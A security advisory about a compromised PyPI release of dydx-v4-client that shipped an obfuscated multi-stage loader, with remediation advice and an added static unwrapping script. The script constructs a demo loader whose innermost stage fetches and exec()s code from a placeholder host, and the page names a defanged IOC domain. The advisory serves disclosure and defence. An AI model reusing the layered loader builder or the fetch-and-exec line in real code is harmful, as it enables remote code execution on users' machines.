Advisory Database

GHSA-4f84-67cv-qrv3: A single post-release of dydx-v4-client contained obfuscated multi-stage loader

February 6, 2026

A PyPI user account was compromised by an attacker, who used it to upload a malicious version (1.1.5.post1) of the dydx-v4-client package. This version contains a highly obfuscated multi-stage loader that ultimately executes attacker-supplied code on the host system.

The final payload is not directly visible, since it is tucked away inside 100 layers of encoding, but the structural design, specifically recursive decompression followed by an exec() call at each layer, is a definitive indicator of malicious software: most likely a crypter or dropper masquerading as a cryptocurrency-related utility, whose purpose is to connect to hxxps://dydx[.]priceoracle[.]site/py and download and execute further payloads. The loader ships inside the sdist as dydx_v4_client/_bootstrap.py (see the PyPI Inspector link under References).
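The structure described above (a literal blob, a chain of decode/decompress calls, then exec(), repeated layer after layer) can be unwrapped without ever running the attacker's code. The following is an added example written for this advisory; it is not code from the dydx-v4-client project, from the malicious release, or from the advisory's authors. It uses only the standard library (Python 3.9+ for ast.unparse), and the sample loader, its nine layers and the host loader.example.invalid are constructed for the demo and are not the real payload or IOC. Each stage is parsed with ast, the exec()/eval() argument is evaluated only if it is a chain of known reversible transforms over a literal, and the walk stops at the first stage that does anything else (here a network fetch), which is exactly where a triager wants to look:

```python
# Added example for this advisory, not code from dydx-v4-client or from the
# malicious release. It statically peels a nested decode-and-exec loader: each
# stage is parsed with `ast`, the exec()/eval() argument is evaluated only when
# it is a chain of known reversible transforms over a literal, and the result is
# the next stage. Anything else (a network call, a variable, an unknown function)
# stops the walk, so attacker code never runs. Sample loader and URL: constructed.
import ast
import base64
import binascii
import lzma
import re
import zlib

# (module, function) -> transform we can reverse in-process.
DECODERS = {
    ("base64", "b64decode"): base64.b64decode,
    ("base64", "b85decode"): base64.b85decode,
    ("binascii", "unhexlify"): binascii.unhexlify,
    ("zlib", "decompress"): zlib.decompress,
    ("lzma", "decompress"): lzma.decompress,
}
URL_RE = re.compile(r"https?://[^\s'\"<>)\]]+")

def static_evaluate(node):
    """Evaluate literals and known transforms only; ValueError for anything else."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (bytes, str)):
        return node.value
    if isinstance(node, ast.Subscript) and ast.unparse(node.slice) == "::-1":
        return static_evaluate(node.value)[::-1]                  # blob[::-1]
    if isinstance(node, ast.Call):
        f = node.func
        if isinstance(f, ast.Name) and f.id == "compile" and node.args:
            return static_evaluate(node.args[0])                  # compile(src, ...)
        if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
            cands = [DECODERS.get((f.value.id, f.attr))]          # zlib.decompress(x)
        elif isinstance(f, ast.Name):                             # decompress(x), bare import
            cands = [fn for (_, n), fn in DECODERS.items() if n == f.id]
        else:
            cands = []
        if any(cands) and len(node.args) == 1:
            data = static_evaluate(node.args[0])
            data = data.encode() if isinstance(data, str) else data
            for fn in filter(None, cands):                        # bare names can be ambiguous
                try:
                    return fn(data)
                except Exception:
                    pass
            raise ValueError("decoder failed on its literal")
        if isinstance(f, ast.Attribute) and f.attr == "decode":   # blob.decode()
            inner = static_evaluate(f.value)
            enc = node.args[0].value if node.args and isinstance(node.args[0], ast.Constant) else "utf-8"
            if isinstance(inner, bytes):
                return inner.decode(enc)
    raise ValueError("unsupported expression: " + type(node).__name__)

def exec_argument(source):
    # Argument node of the first exec()/eval() call in `source`, else None.
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args):
            return node.args[0]
    return None

def peel(source, max_layers=500):
    """(stages, reason): recovered stages outermost first; last one is where it stopped."""
    stages = [source]
    for _ in range(max_layers):
        try:
            arg = exec_argument(stages[-1])
            if arg is None:
                return stages, "no exec()/eval() call in this stage"
            nxt = static_evaluate(arg)
        except (SyntaxError, ValueError) as e:
            return stages, "cannot unwrap statically (%s)" % e
        stages.append(nxt.decode("utf-8", "replace") if isinstance(nxt, bytes) else nxt)
    return stages, "layer limit reached"

def defang(url):  # hxxps://host[.]tld/path, so an extracted IOC cannot be auto-linked
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path

def analyse(source):
    stages, reason = peel(source)
    return {"layers": len(stages) - 1, "stopped_because": reason, "final_stage": stages[-1],
            "urls": [defang(u) for u in URL_RE.findall(stages[-1])]}

def build_sample(stage, layers):
    # Demo builder: wrap `stage` in alternating decode-and-exec shells (constructed).
    for i in range(layers):
        raw = stage.encode()
        if i % 2 == 0:
            blob = base64.b64encode(zlib.compress(raw))
            stage = "import base64, zlib\nexec(zlib.decompress(base64.b64decode(%r)).decode())\n" % blob
        else:
            blob = base64.b85encode(lzma.compress(raw))[::-1]
            stage = ("from base64 import b85decode\nimport lzma\n"
                     "exec(compile(lzma.decompress(b85decode(%r[::-1])), '<s>', 'exec'))\n" % blob)
    return stage

# Constructed innermost stage: fetches and runs a remote script; placeholder host, not the real IOC.
FINAL_STAGE = ("import urllib.request\n"
               "exec(urllib.request.urlopen('https://loader.example.invalid/py').read())\n")
SAMPLE_LOADER = build_sample(FINAL_STAGE, 9)
```

Running analyse(SAMPLE_LOADER) peels all nine constructed layers and stops at the innermost stage because its exec() argument is a urlopen() call rather than a decode chain; the report carries the layer count, the stop reason, the recovered source and the defanged URL. Against a real sample you would feed analyse() the contents of the suspicious file (here that would be _bootstrap.py) and, as with any static unwrapper, treat a stop reason other than a network call as a prompt to extend DECODERS rather than to run the stage.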

Users of the dydx-v4-client package should immediately uninstall version 1.1.5.post1 and revert to the last known good version (1.1.5), or move to a later clean release once one is available. Do not rely on pip install --upgrade for this: under PEP 440 a post-release sorts after its base release, so 1.1.5.post1 is treated as newer than 1.1.5 and has to be replaced with an explicit pin (dydx-v4-client==1.1.5). Any host on which the malicious version was installed should be treated as potentially compromised: monitor it for unusual activity, check for outbound connections to the domain above, rotate credentials and tokens that were accessible from it, and run security scans.

References

  • github.com/advisories/GHSA-4f84-67cv-qrv3
  • github.com/lenktn/lenktn-dydx-v4-python
  • github.com/pypa/advisory-database/tree/main/vulns/dydx-v4-client/PYSEC-2026-1.yaml
  • inspector.pypi.io/project/dydx-v4-client/1.1.5.post1/packages/4b/06/4d848676e932b0fc9d707bb78603dc76555141cc832819cd1e5077bdf2a2/dydx_v4_client-1.1.5.post1.tar.gz/dydx_v4_client-1.1.5.post1/dydx_v4_client/_bootstrap.py

Affected versions

Version 1.1.5.post1 only. (The auto-generated range "starting from 1.1.5.post1 before 1.1.5" is empty under PEP 440 ordering, where a post-release sorts after its base release; the affected set is exactly that one version.)

Fixed versions

  • 1.1.5

Solution

Pin to version 1.1.5, the last release before the compromise (dydx-v4-client==1.1.5), or to a later clean release once one is published. A plain upgrade is not sufficient: under PEP 440, 1.1.5.post1 sorts after 1.1.5, so "1.1.5 or above" still includes the malicious release.

Impact 9.8 CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Weakness

  • CWE-506: Embedded Malicious Code

Source file

pypi/dydx-v4-client/GHSA-4f84-67cv-qrv3.yml


Page generated Sat, 07 Feb 2026 12:18:06 +0000.